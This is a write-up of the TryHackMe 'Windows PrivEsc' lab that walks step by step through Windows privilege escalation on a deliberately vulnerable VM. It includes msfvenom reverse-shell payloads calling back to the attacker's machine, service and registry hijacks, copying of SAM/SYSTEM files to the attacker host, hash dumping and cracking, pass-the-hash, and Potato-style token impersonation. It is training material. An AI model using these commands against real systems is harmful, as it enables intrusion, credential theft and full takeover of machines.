Windows PrivEsc
Another interesting walking through a variety of Windows Privilege Escalation techniques compiled by tryhackme .
This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Windows Privilege Escalation for OSCP and Beyond! course on Udemy.
Tryhackme
Task 2 Generate a Reverse Shell Executable
$ xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.22.168Generate the reverse shell payload,
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.108 LPORT=53 -f exe -o reverse.exeTransfer file using SMB server
└─# sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedCopy the payload to windows machine
copy \\10.9.0.108\kali\reverse.exe C:\PrivEsc\reverse.exerun listener on kali, then execute the payload on windows
C:\PrivEsc\reverse.exeWe catch the shell
└─$ sudo nc -nvlp 53
listening on [any] 53 ...
connect to [10.9.0.108] from (UNKNOWN) [10.10.22.168] 49926
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\user>Task 3 Service Exploits — Insecure Service Permissions
Use accesschk.exe to check the “user” account’s permissions on the “daclsvc” service:
C:\Users\user>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):
sc qc daclsvc
Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
C:\Users\user>net start daclsvcGot reverse shell by exploiting the service
C:\Program Files\DACL Service\daclservice.exe
Task 4 Service Exploits — Unquoted Service Path
# Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\Users\user>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
# Copy the reverse.exe executable you created to this directory and rename it Common.exe:
C:\Users\user>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
# Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
C:\Users\user>net start unquotedsvc
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Task 5 Service Exploits — Weak Registry Permissions
Query the “regsvc” service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).
sc qc regsvc
Using accesschk.exe, note that the registry entry for the regsvc service is writable by the “NT AUTHORITY\INTERACTIVE” group (essentially all logged-on users):
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Overwrite the ImagePath registry key to point to the reverse.exe executable you created:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start regsvc
Task 6 Service Exploits — Insecure Service Executables
Query the “filepermsvc” service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).
sc qc filepermsvc
Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
Copy the reverse.exe executable you created and replace the filepermservice.exe with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /YStart a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start filepermsvc
Task 7 Registry — AutoRuns
Query the registry for AutoRun executables:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /YStart a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!
└─$ xfreerdp /u:admin /p:password123 /cert:ignore /v:10.10.138.203
Task 8 Registry — AlwaysInstallElevated
Query the registry for AlwaysInstallElevated keys:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
both keys are set to 1 (0x1), so it always installed elevated as system
generate a reverse shell Windows Installer (reverse.msi) using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).
C:\Users\user>copy \\10.9.0.108\kali\reverse.msi C:\PrivEsc\reverse.msi
1 file(s) copied.Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:
msiexec /quiet /qn /i C:\PrivEsc\reverse.msiTask 9 Passwords — Registry
Search the registry for word “password”
reg query HKLM /f password /t REG_SZ /sor faster way
C:\Users\user>C:\PrivEsc\winPEASany.exe password fast
Get the user name from
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
check user elevation
C:\Windows\system32>whoami /groups | find "S-1-16-12288"On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):
─$ winexe -U 'admin%password123' //10.10.138.203 cmd.exe
Task 10 Passwords — Saved Creds
List any saved credentials:
cmdkey /list
the credentials for the “admin” user are saved,Start a listener on Kali and run the reverse.exe executable using runas with the admin user’s saved credentials:
runas /savecred /user:admin C:\PrivEsc\reverse.exe
Task 11 Passwords — Security Account Manager (SAM)
The SAM and SYSTEM files can be used to extract user password hashes. This VM has insecurely stored backups of the SAM and SYSTEM files in the C:\Windows\Repair\ directory.
Transfer the SAM and SYSTEM files to your Kali VM:
C:\Users\user>copy C:\Windows\Repair\SAM \\10.9.0.108\kali\
1 file(s) copied.
C:\Users\user>copy C:\Windows\Repair\SYSTEM \\10.9.0.108\kali\
1 file(s) copied.On Kali, clone the creddump7 repository (the one on Kali is outdated and will not dump hashes correctly for Windows 10!) and use it to dump out the hashes from the SAM and SYSTEM files:
git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM# Better working with virtual pip
─$ pipenv install pycrypto
Creating a virtualenv for this project...
Pipfile: /home/kali/Documents/Privesc/Windows/creddump/Pipfile
Using /usr/bin/python3 (3.9.2) to create virtualenv...
⠏ Creating virtual environment...created virtual environment CPython3.9.2.final.0-64 in 605ms
creator CPython3Posix(dest=/home/kali/.local/share/virtualenvs/creddump-zrhnRO7r, clear=False, no_vcs_ignore=False, global=False)
seeder FromAppData(download=False, pip=bundle, setuptools=bundle, wheel=bundle, via=copy, app_data_dir=/home/kali/.local/share/virtualenv)
added seed packages: pip==21.2.4, setuptools==58.0.4, wheel==0.37.0
activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator
✔ Successfully created virtual environment!
Virtualenv location: /home/kali/.local/share/virtualenvs/creddump-zrhnRO7r
Creating a Pipfile for this project...
Installing pycrypto...
Adding pycrypto to Pipfile's [packages]...
✔ Installation Succeeded
Pipfile.lock not found, creating...
Locking [dev-packages] dependencies...
Locking [packages] dependencies...
Building requirements...
Resolving dependencies...
✔ Success!
Updated Pipfile.lock (3ba98a)!
Installing dependencies from Pipfile.lock (3ba98a)...
🐍 ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 0/0 — 00:00:00
To activate this project's virtualenv, run pipenv shell.
Alternatively, run a command inside the virtualenv with pipenv run.
┌──(kali㉿kali)-[~/Documents/Privesc/Windows/creddump]
└─$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
remote: Enumerating objects: 107, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 107 (delta 0), reused 1 (delta 0), pack-reused 102
Receiving objects: 100% (107/107), 51.65 KiB | 777.00 KiB/s, done.
Resolving deltas: 100% (55/55), done.
┌──(kali㉿kali)-[~/Documents/Privesc/Windows/creddump]
└─$ ls
creddump7 Pipfile Pipfile.lock─$ pipenv run python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::# <--- NTLM hash to crack
Crack the admin NTLM hash using hashcat:
hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txtYou can use the cracked password to log in as the admin using winexe or RDP.
a9fdfa038c4b75ebc76dc855dd74f0da
Task 12 Passwords — Passing the Hash
Alternatively, Use the full admin hash with pth-winexe to spawn a shell running as admin without cracking their password. Remember the complete hash includes both the LM and NTLM hash, separated by a colon
─$ pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.133.17 cmd.exe
Task 13 Scheduled Tasks
type C:\DevTools\CleanUp.ps1
The script is self described . Using accesschk.exe, will exploite the ability to write to this file:
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:
C:\Users\user>echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.
Task 14 Insecure GUI Apps
Start an RDP session as the “user” account:
rdesktop -u user -p password321 10.10.133.17Double-click the “AdminPaint” shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:
tasklist /V | findstr mspaint.exe
In Paint, click “File” and then “Open”. In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe
Press Enter to spawn a command prompt running with admin privileges.
Task 15 Startup Apps
Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:
cscript C:\PrivEsc\CreateShortcut.vbsOr using powershell
PS C:\Users\user> $s=(New-Object -COM WScript.Shell).CreateShortcut('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk');
PS C:\Users\user> $s.TargetPath='C:\PrivEsc\reverse.exe'
PS C:\Users\user> $s.Save()
Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:
─$ xfreerdp /u:admin /p:password123 /cert:ignore /v:10.10.133.17A shell running as admin should connect back to your listener.
Task 16 Token Impersonation — Rogue Potato
copy \10.9.0.108\kali\reverse.exe C:\PrivEsc\reverse.exe
There are two types of tokens:
1: Delegate
2: Impersonate
Delegate: Delegate tokens are created for ‘interactive’ logons, such as logging into the machine or connecting to it via Remote Desktop.
Impersonate tokens: Impersonate tokens are for ‘non-interactive’ sessions, such as attaching a network drive or a domain logon script.
Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.126.172:9999Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the “local service” account:
Generate two different reverse shell
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.212 LPORT=53 -f exe -o reverse.exe─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.212 LPORT=909 -f exe -o reverse909.exe
Copy both to win victim machine
C:\Windows\system32>copy \\10.9.0.212\kali\reverse.exe C:\PrivEsc\reverse.exe # 53 reverse
C:\Windows\system32>copy \\10.9.0.212\kali\reverse909.exe C:\PrivEsc\reverse909.exe # 909 reverseActivate the reverse (53) to get local service
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exeAfter recieving the shell(53) ,in the “local service” reverse shell, run windows shell from their (-r should reference kali machine), 9999 should be same used in socat
Run roguePortato to escalate local service to windows
C:\Windows\system32>C:\PrivEsc\RoguePotato.exe -r 10.9.0.212 -e "C:\PrivEsc\rev909.exe" -l 9999
Recieve the system shell on second reverse(909)
Task 17 Token Impersonation — PrintSpoofer
in Windows open the cmd as Administrator and Copy the 53 and 909 reverse shell code
Run the 53 listener
└─$ sudo nc -nvlp 53
listening on [any] 53 ...run the reverse shell 53 code, if all is correct we should reverse shell
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\rev53.exe
Start another listener on Kali for port 909. Now, in the “local service” reverse shell 53, run the PrintSpoofer exploit to trigger 909 reverse shell running with SYSTEM privileges , now we should recieve the revere shell on 909 with SYSTEM privilages
Task 18 Privilege Escalation Scripts
PowerUp.ps1
PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. See README.md for more information.
# One line
C:\Users\admin> powershell -nop -exec bypass -c "Import-Module C:\PrivEsc\PowerUp.ps1; Invoke-AllChecks"
# Multiple lines
C:\Users\admin>powershell -nop -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\admin> Import-Module C:\PrivEsc\PowerUp.ps1
PS C:\Users\admin> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
PS C:\Users\admin> type .\checks.txt
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.SharpUp.exe
C:\Users\admin>c:\PrivEsc\SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[*] In medium integrity but user is a local administrator- UAC can be bypassed.
[*] Audit mode: running all checks anyway.
=== Modifiable Services ===
Name : daclsvc
DisplayName : DACL Service
Description :
State : Stopped
StartMode : Manual
PathName : "C:\Program Files\DACL Service\daclservice.exe"
=== Modifiable Service Binaries ===
Name : filepermsvc
DisplayName : File Permissions Service
Description :
State : Stopped
StartMode : Manual
PathName : "C:\Program Files\File Permissions Service\filepermservice.exe"
=== AlwaysInstallElevated Registry Keys ===
HKLM: 1
=== Modifiable Folders in %PATH% ===
Modifable %PATH% Folder : C:\Temp
=== Modifiable Registry Autoruns ===
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run : C:\Program Files\Autorun Program\program.exe
=== *Special* User Privileges ===
=== Unattended Install Files ===
C:\Windows\Panther\Unattend.xml
=== McAfee Sitelist.xml Files ===
=== Cached GPP Password ===
[X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.
[*] Completed Privesc Checks in 0 secondsMost of scripts use same technique mentioned in these tasks
